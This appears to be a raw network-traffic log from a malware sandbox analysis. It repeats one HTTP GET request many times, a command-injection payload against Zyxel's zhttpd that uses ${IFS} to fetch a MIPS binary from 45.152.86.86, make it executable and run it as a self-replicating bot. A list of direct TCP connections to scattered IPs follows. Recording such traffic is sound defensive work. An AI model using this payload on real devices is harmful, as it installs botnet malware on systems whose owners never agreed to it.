      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: unknownTCP traffic detected without corresponding DNS query: 162.166.168.146
      Source: unknownTCP traffic detected without corresponding DNS query: 135.202.134.146
      Source: unknownTCP traffic detected without corresponding DNS query: 109.191.103.221
      Source: unknownTCP traffic detected without corresponding DNS query: 201.197.143.147
      Source: unknownTCP traffic detected without corresponding DNS query: 83.48.53.21
      Source: unknownTCP traffic detected without corresponding DNS query: 24.137.140.253
      Source: unknownTCP traffic detected without corresponding DNS query: 99.237.220.190
      Source: unknownTCP traffic detected without corresponding DNS query: 84.101.31.71
      Source: unknownTCP traffic detected without corresponding DNS query: 48.101.109.101
      Source: unknownTCP traffic detected without corresponding DNS query: 19.12.179.225
      Source: unknownTCP traffic detected without corresponding DNS query: 168.105.24.249
      Source: unknownTCP traffic detected without corresponding DNS query: 79.251.15.161
      Source: unknownTCP traffic detected without corresponding DNS query: 91.77.65.123
      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.79.82
      Source: unknownTCP traffic detected without corresponding DNS query: 48.198.138.165
      Source: unknownTCP traffic detected without corresponding DNS query: 71.18.118.113
      Source: unknownTCP traffic detected without corresponding DNS query: 39.42.37.41
      Source: unknownTCP traffic detected without corresponding DNS query: 42.150.14.57
      Source: unknownTCP traffic detected without corresponding DNS query: 79.232.129.213
      Source: unknownTCP traffic detected without corresponding DNS query: 12.79.68.0
      Source: unknownTCP traffic detected without corresponding DNS query: 200.218.215.252
      Source: unknownTCP traffic detected without corresponding DNS query: 86.16.142.44
      Source: unknownTCP traffic detected without corresponding DNS query: 14.253.247.243
      Source: unknownTCP traffic detected without corresponding DNS query: 67.148.23.43
      Source: unknownTCP traffic detected without corresponding DNS query: 137.83.187.157
      Source: unknownTCP traffic detected without corresponding DNS query: 150.236.21.195
      Source: unknownTCP traffic detected without corresponding DNS query: 43.100.250.179
      Source: unknownTCP traffic detected without corresponding DNS query: 79.66.154.53
      Source: unknownTCP traffic detected without corresponding DNS query: 77.116.179.176
      Source: unknownTCP traffic detected without corresponding DNS query: 43.193.213.98
      Source: unknownTCP traffic detected without corresponding DNS query: 87.83.152.211
      Source: unknownTCP traffic detected without corresponding DNS query: 135.33.81.40
      Source: unknownTCP traffic detected without corresponding DNS query: 152.4.37.91
      Source: unknownTCP traffic detected without corresponding DNS query: 218.27.106.165
      Source: unknownTCP traffic detected without corresponding DNS query: 168.134.65.213
      Source: unknownTCP traffic detected without corresponding DNS query: 84.27.234.177
      Source: unknownTCP traffic detected without corresponding DNS query: 189.255.39.29
      Source: unknownTCP traffic detected without corresponding DNS query: 120.255.206.108
      Source: unknownTCP traffic detected without corresponding DNS query: 101.240.156.109
      Source: unknownTCP traffic detected without corresponding DNS query: 73.69.128.249
      Source: unknownTCP traffic detected without corresponding DNS query: 72.226.250.146
      Source: unknownTCP traffic detected without corresponding DNS query: 75.201.43.7
      Source: unknownTCP traffic detected without corresponding DNS query: 191.30.102.235
      Source: unknownTCP traffic detected without corresponding DNS query: 69.250.128.23
      Source: unknownTCP traffic detected without corresponding DNS query: 180.234.238.90
      Source: unknownTCP traffic detected without corresponding DNS query: 84.205.171.161
      Source: unknownTCP traffic detected without corresponding DNS query: 146.169.152.109
      Source: unknownTCP traffic detected without corresponding DNS query: 131.165.6.53
      Source: unknownTCP traffic detected without corresponding DNS query: 125.147.126.137
      Source: unknownTCP traffic detected without corresponding DNS query: 95.229.92.4
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
      Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;
